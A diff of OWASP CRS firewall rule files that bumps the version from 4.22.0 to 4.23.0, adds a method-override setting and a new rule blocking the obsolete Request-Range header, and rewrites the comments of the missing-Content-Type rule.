ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.restricted_headers_extended=/accept-charset/'" +# +# -=[ Method Override Parameter Configuration ]=- +# +# Initialize the allow_method_override_parameter variable. +# This controls whether the _method parameter is permitted for HTTP method +# override (used by frameworks like Laravel, Rails, Symfony). +# +# To allow _method parameter, set tx.allow_method_override_parameter=1 +# in crs-setup.conf (see rule 900510). +# +SecRule &TX:allow_method_override_parameter "@eq 0" \ + "id:901510,\ + phase:1,\ + pass,\ + nolog,\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.23.0',\ + setvar:'tx.allow_method_override_parameter=0'" + # Default enforcing of body processor URLENCODED (rule 900010 in crs-setup.conf) SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ "id:901167,\ @@ -256,7 +275,7 @@ SecRule &TX:enforce_bodyproc_urlencoded "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.enforce_bodyproc_urlencoded=0'" # Default check for UTF8 encoding validation (rule 900950 in crs-setup.conf) @@ -266,7 +285,7 @@ SecRule &TX:crs_validate_utf8_encoding "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.crs_validate_utf8_encoding=0'" # Default check for skipping response analysis (rule 900500 in crs-setup.conf) @@ -276,7 +295,7 @@ SecRule &TX:crs_skip_response_analysis "@eq 0" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.crs_skip_response_analysis=0'" # @@ -294,7 +313,7 @@ SecAction \ t:none,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.blocking_inbound_anomaly_score=0',\ setvar:'tx.detection_inbound_anomaly_score=0',\ setvar:'tx.inbound_anomaly_score_pl1=0',\ @@ -336,7 +355,7 @@ SecRule &TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.ua_hash=%{REQUEST_HEADERS.User-Agent}',\ chain" SecRule TX:ENABLE_DEFAULT_COLLECTIONS "@eq 1" \ @@ -362,7 +381,7 @@ SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ msg:'Enabling body inspection',\ tag:'OWASP_CRS',\ ctl:forceRequestBodyVariable=On,\ - ver:'OWASP_CRS/4.22.0'" + ver:'OWASP_CRS/4.23.0'" # Force body processor URLENCODED SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ @@ -374,7 +393,7 @@ SecRule TX:enforce_bodyproc_urlencoded "@eq 1" \ noauditlog,\ msg:'Enabling forced body inspection for ASCII content',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ chain" SecRule REQBODY_PROCESSOR "!@rx (?:URLENCODED|MULTIPART|XML|JSON)" \ "ctl:requestBodyProcessor=URLENCODED" @@ -414,7 +433,7 @@ SecRule TX:sampling_percentage "@eq 100" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ skipAfter:END-SAMPLING" SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ @@ -425,7 +444,7 @@ SecRule UNIQUE_ID "@rx ^[a-f]*([0-9])[a-f]*([0-9])" \ t:sha1,t:hexEncode,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'TX.sampling_rnd100=%{TX.1}%{TX.2}'" # @@ -450,7 +469,7 @@ SecRule TX:sampling_rnd100 "!@lt %{tx.sampling_percentage}" \ msg:'Sampling: Disable the rule engine based on sampling_percentage %{TX.sampling_percentage} and random number %{TX.sampling_rnd100}',\ tag:'OWASP_CRS',\ ctl:ruleRemoveByTag=OWASP_CRS,\ - ver:'OWASP_CRS/4.22.0'" + ver:'OWASP_CRS/4.23.0'" SecMarker "END-SAMPLING" @@ -469,4 +488,4 @@ SecRule TX:detection_paranoia_level "@lt %{tx.blocking_paranoia_level}" \ log,\ msg:'Detection paranoia level configured is lower than the paranoia level itself. This is illegal. Blocking request. Aborting',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0'" + ver:'OWASP_CRS/4.23.0'" diff --git a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf index 42a5d9cdde..1c3b2a31c5 100644 --- a/rules/REQUEST-905-COMMON-EXCEPTIONS.conf +++ b/rules/REQUEST-905-COMMON-EXCEPTIONS.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -25,7 +25,7 @@ SecRule REQUEST_LINE "@streq GET /" \ tag:'platform-apache',\ tag:'attack-generic',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ chain" SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ "t:none,\ @@ -46,7 +46,7 @@ SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,::1" \ tag:'platform-apache',\ tag:'attack-generic',\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ chain" SecRule REQUEST_HEADERS:User-Agent "@endsWith (internal dummy connection)" \ "t:none,\ diff --git a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf index 9c5d377434..ec11c111fc 100644 --- a/rules/REQUEST-911-METHOD-ENFORCEMENT.conf +++ b/rules/REQUEST-911-METHOD-ENFORCEMENT.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -39,31 +39,31 @@ SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/METHOD-ENFORCEMENT',\ tag:'capec/1000/210/272/220/274',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-913-SCANNER-DETECTION.conf b/rules/REQUEST-913-SCANNER-DETECTION.conf index 240989225c..a801a31200 100644 --- a/rules/REQUEST-913-SCANNER-DETECTION.conf +++ b/rules/REQUEST-913-SCANNER-DETECTION.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -51,29 +51,29 @@ SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/SCANNER-DETECTION',\ tag:'capec/1000/118/224/541/310',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-913-SCANNER-DETECTION" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf index f116f6652c..29de94d410 100644 --- a/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf +++ b/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -23,8 +23,8 @@ # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -65,7 +65,7 @@ SecRule REQUEST_LINE "!@rx (?i)^(?:get /[^#\?]*(?:\?[^\s\x0b#]*)?(?:#[^\s\x0b]*) tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" @@ -121,7 +121,7 @@ SecRule FILES|FILES_NAMES "!@rx (?i)^(?:&(?:(?:[acegilnorsuz]acut|[aeiou]grav|[a tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -151,7 +151,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -186,7 +186,7 @@ SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Content-Length "!@rx ^0?$" \ @@ -212,7 +212,7 @@ SecRule REQUEST_METHOD "@rx ^(?:GET|HEAD)$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \ @@ -253,7 +253,7 @@ SecRule REQUEST_PROTOCOL "!@within HTTP/2 HTTP/2.0 HTTP/3 HTTP/3.0" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" SecRule REQUEST_METHOD "@streq POST" \ @@ -284,7 +284,7 @@ SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" SecRule &REQUEST_HEADERS:Content-Length "!@eq 0" \ @@ -307,7 +307,7 @@ SecRule &REQUEST_HEADERS:Transfer-Encoding "!@eq 0" \ # https://datatracker.ietf.org/doc/html/rfc7233 # https://seclists.org/fulldisclosure/2011/Aug/175 # -SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx (\d+)-(\d+)" \ +SecRule REQUEST_HEADERS:Range "@rx (\d+)-(\d+)" \ "id:920190,\ phase:1,\ block,\ @@ -323,12 +323,54 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx (\d+)-(\d+)" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" SecRule TX:2 "@lt %{tx.1}" \ "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" +# The `Request-Range` header is a legacy/non-standard HTTP header that dates back to Netscape +# Navigator 2-3 and MSIE 3 (~1996-1997). It was never part of any HTTP RFC and has no legitimate +# use in modern web traffic. +# +## Background +# +### Origin of `Request-Range` +# +# The header originated from an early draft of HTTP byte-range requests before standardization: +# +# - **Draft standard**: Defined `Request-Range` header with `multipart/x-byteranges` response type +# - **HTTP/1.1 (RFC 2068/7233/9110)**: Standardized as `Range` header with `multipart/byteranges` response type +# - **Netscape Navigator 2-3**: Sent **both** `Range` and `Request-Range` headers (with the same value) +# - **Netscape Communicator 4+**: Dropped the non-standard `Request-Range` header +# +# Rationale for Blocking +# +# | Factor | Assessment | +# |---------------------------|---------------------------------------------------------------| +# | **Legitimate modern use** | None - header is ~25 years obsolete | +# | **Last known clients** | Netscape Navigator 2-3, MSIE 3 (1996-1997) | +# | **False positive risk** | Essentially zero | +# | **Attack surface** | Servers may still process it; could bypass `Range`-only rules | +# | **RFC status** | Never standardized; not in RFC 9110 | +SecRule &REQUEST_HEADERS:Request-Range "@gt 0" \ + "id:920660,\ + phase:1,\ + block,\ + t:none,\ + msg:'Obsolete Request-Range header detected',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.23.0',\ + severity:'WARNING',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" # # Broken/Malicious clients often have duplicate or conflicting headers @@ -356,7 +398,7 @@ SecRule REQUEST_HEADERS:Connection "@rx \b(?:keep-alive|close),\s?(?:keep-alive| tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" @@ -385,7 +427,7 @@ SecRule TX:CRS_VALIDATE_UTF8_ENCODING "@eq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153/267',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES "@validateUtf8Encoding" \ @@ -430,7 +472,7 @@ SecRule REQUEST_URI|REQUEST_BODY "@rx (?i)%uff[0-9a-f]{2}" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" @@ -487,7 +529,7 @@ SecRule REQUEST_URI_RAW|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 1-25 tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -519,7 +561,7 @@ SecRule &REQUEST_HEADERS:Host "@eq 0" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ skipAfter:END-HOST-CHECK" @@ -539,7 +581,7 @@ SecRule REQUEST_HEADERS:Host "@rx ^$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -580,7 +622,7 @@ SecRule REQUEST_HEADERS:Accept "@rx ^$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'NOTICE',\ chain" SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ @@ -606,7 +648,7 @@ SecRule REQUEST_HEADERS:Accept "@rx ^$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'NOTICE',\ chain" SecRule REQUEST_METHOD "!@rx ^OPTIONS$" \ @@ -640,37 +682,40 @@ SecRule REQUEST_HEADERS:User-Agent "@rx ^$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'NOTICE',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'" # -# Missing Content-Type Header with Request Body +# Missing Content-Type Header with Request Body (Phase 1) # # -=[ Rule Logic ]=- -# This rule will first check to see if the value of the Content-Length header is -# non-equal to 0. The chained rule is then checking the existence of the -# Content-Type header. The RFCs do not state there must be a -# Content-Type header. However, a request missing a Content-Header is a -# strong indication of a non-compliant browser or an evasion attempt. -# -# Also, omitting the CT header allows to bypass the Request Body Processor -# unless you set the optional tx.enforce_bodyproc_urlencoded variable. -# -# Enabling this rule is important as it maximizes -# the detection of risky practices that attempt to disable -# body processors (such as XML, JSON, etc.) in order to hide -# malicious payloads. +# This rule checks if the Content-Length header value is non-zero (indicating +# the client declares a body is present), then verifies the existence of the +# Content-Type header. While RFCs do not mandate a Content-Type header for all +# requests, its absence in requests with a body is a strong indication of a +# non-compliant browser or an evasion attempt. +# +# Omitting the Content-Type header allows bypassing the Request Body Processor +# unless you set the optional tx.enforce_bodyproc_urlencoded variable. This can +# be used to evade detection by preventing proper parsing of XML, JSON, or other +# body formats. +# +# This rule operates in phase:1 (request headers) based on the Content-Length +# header declaration. A complementary rule (920640) operates in phase:2 based +# on the actual REQUEST_BODY_LENGTH to catch cases where the body is present +# but Content-Length was omitted or set to zero. # # -=[ References ]=- -# http://httpwg.org/specs/rfc7231.html#header.content-type +# https://httpwg.org/specs/rfc7231.html#header.content-type +# https://httpwg.org/specs/rfc7230.html#header.content-length SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ "id:920340,\ phase:1,\ block,\ t:none,\ - msg:'Request Containing Content, but Missing Content-Type header',\ + msg:'Content-Type header missing from request with non-zero Content-Length',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ @@ -679,7 +724,7 @@ SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ @@ -724,7 +769,7 @@ SecRule REQUEST_HEADERS:Host "@rx (?:^([\d.]+|\[[\da-f:]+\]|[\da-f:]+)(:[\d]+)?$ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" @@ -757,7 +802,7 @@ SecRule &TX:MAX_NUM_ARGS "@eq 1" \ tag:'OWASP_CRS',\ 